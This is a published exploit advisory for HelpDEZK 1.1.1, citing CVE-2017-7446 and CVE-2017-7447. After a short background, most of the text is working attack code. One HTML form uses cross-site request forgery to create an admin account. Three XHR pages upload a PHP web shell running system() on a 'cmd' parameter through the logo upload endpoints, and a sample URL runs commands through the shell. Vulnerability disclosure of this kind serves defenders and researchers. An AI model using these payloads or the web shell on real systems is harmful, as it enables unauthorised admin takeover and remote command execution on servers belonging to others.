
# Exploit Title: Multiple CSRF Remote Code Execution Vulnerability on HelpDEZK 1.1.1
# Date: 05-April-2017
# Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy
# Vendor Homepage: http://www.helpdezk.org/
# Software Link: https://codeload.github.com/albandes/helpdezk/zip/v1.1.1
# Version: 1.1.1
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 - CRITICAL)
# CVE: CVE-2017-7446 and CVE-2017-7447

I. Background:

HelpDEZk is a powerful application for managing requests and incidents. It provides everything needed for efficient workflow management of all the processes involved in service execution, covering both internal demands and outsourced services. HelpDEZk can be used in any area of a company and supports the shared service centre concept; besides logging every process and keeping each request's history, it can route a request through several approval levels. HelpDEZk combines advanced management features with very easy use: simple, intuitive screens make the team's daily work easier, speeding up procedures and saving time. It is developed in object-oriented PHP with an MVC architecture and uses the SMARTY template system; jQuery is used for the JavaScript.

II. Description:

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests such as transferring funds or changing their email address. If the victim is an administrative account, CSRF can compromise the entire web application.

HelpDEZK assigns each person one of the following role types (the "typeuser" value used in the requests below):

admin = 1
user = 2
operator = 3
customer = 4
partner = 5
group = 6

III. Exploit:

-> The first CSRF target is: "/admin/home#/person/"
(Admin - Records - People & Companies)

An attacker who has no account at all can create an account with admin privileges through this request. The following page creates such an account:
<html>
<!-- CSRF PoC on insert menu people -->
<body>
<form action="http://192.168.228.186/helpdezk-1.1.1/admin/person/insertNatural" method="POST">
<input type="hidden" name="login" value="testing" />
<input type="hidden" name="logintype" value="3" /> <!-- Type Login = 3 (HD) -->
<input type="hidden" name="password" value="testing" />
<input type="hidden" name="name" value="testing" />
<input type="hidden" name="email" value="testing@local.com" /> <!-- e.g: testing@local.com -->
<input type="hidden" name="company" value="60" />
<input type="hidden" name="department" value="1" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="branch" value="" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="country" value="1" />
<input type="hidden" name="state" value="1" />
<input type="hidden" name="cpf" value="" />
<input type="hidden" name="city" value="1" />
<input type="hidden" name="neighborhood" value="Choose" />
<input type="hidden" name="zipcode" value="" />
<input type="hidden" name="typestreet" value="1" />
<input type="hidden" name="address" value="Choose" />
<input type="hidden" name="number" value="" />
<input type="hidden" name="complement" value="" />
<input type="hidden" name="typeuser" value="1" /> <!-- admin privilege -->
<input type="hidden" name="location" value="" />
<input type="hidden" name="vip" value="N" />
<input type="hidden" name="filladdress" value="N" />
<input type="hidden" name="dtbirth" value="" />
<input type="hidden" name="gender" value="M" />
<input type="hidden" name="time_value" value="" />
<input type="hidden" name="overtime" value="" />
<input type="hidden" name="changePassInsert" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

-> The second CSRF target is: "/admin/home#/logos/"
(Admin - Config - Logos)

Even the lowest-privileged account can obtain remote code execution by uploading a web shell through the Logos module (Page Header, Login Page and Reports logo). HelpDEZK does not restrict the extension of the uploaded file; the Logos page is normally reachable only by an admin, but the upload requests succeed from a low-privileged account.

With a low-privileged account, log in to the application first, then use whichever of the following pages matches the logo slot you want to abuse:
<!-- CSRF PoC - Login Page Logo -->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload2", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1883328331133778598415248998");
xhr.withCredentials = true; // send the victim's HelpDEZK session cookie with the cross-site request
// hand-built multipart body: one file part named "file" carrying the PHP shell
var body = "-----------------------------1883328331133778598415248998\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" +
"Content-Type: text/php\r\n" +
"\r\n" +
"\x3c?php\n" +
"\n" +
"if(isset($_REQUEST[\'cmd\'])){\n" +
" echo \"\x3cpre\x3e\";\n" +
" $cmd = ($_REQUEST[\'cmd\']);\n" +
" system($cmd);\n" +
" echo \"\x3c/pre\x3e\";\n" +
" die;\n" +
"}\n" +
"\n" +
"?\x3e\r\n" +
"-----------------------------1883328331133778598415248998--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

----

<!-- CSRF PoC Page Header Logo -->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------11525671838941487412014811928");
xhr.withCredentials = true; // send the victim's HelpDEZK session cookie with the cross-site request
var body = "-----------------------------11525671838941487412014811928\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n" +
"Content-Type: text/php\r\n" +
"\r\n" +
"\x3c?php\n" +
"\n" +
"if(isset($_REQUEST[\'cmd\'])){\n" +
" echo \"\x3cpre\x3e\";\n" +
" $cmd = ($_REQUEST[\'cmd\']);\n" +
" system($cmd);\n" +
" echo \"\x3c/pre\x3e\";\n" +
" die;\n" +
"}\n" +
"\n" +
"?\x3e\r\n" +
"-----------------------------11525671838941487412014811928--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

----

<!-- CSRF PoC - Reports Logo -->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload3", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1789373681642463979344317937");
xhr.withCredentials = true; // send the victim's HelpDEZK session cookie with the cross-site request
var body = "-----------------------------1789373681642463979344317937\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" +
"Content-Type: text/php\r\n" +
"\r\n" +
"\x3c?php\n" +
"\n" +
"if(isset($_REQUEST[\'cmd\'])){\n" +
" echo \"\x3cpre\x3e\";\n" +
" $cmd = ($_REQUEST[\'cmd\']);\n" +
" system($cmd);\n" +
" echo \"\x3c/pre\x3e\";\n" +
" die;\n" +
"}\n" +
"\n" +
"?\x3e\r\n" +
"-----------------------------1789373681642463979344317937--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

----

If the request succeeded, the uploaded file can be found under:

http://example.com/helpdezk-1.1.1/app/uploads/logos/

and commands can then be executed through it, for example:

http://example.com/helpdezk-1.1.1/app/uploads/logos/login_index.php?cmd=ipconfig

IV. Thanks to:

- Alloh SWT
- MyBoboboy
- Komunitas IT Auditor & IT Security

Refer:

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)
http://rungga.blogspot.co.id/2017/04/multiple-csrf-remote-code-execution.html
https://github.com/albandes/helpdezk/issues/2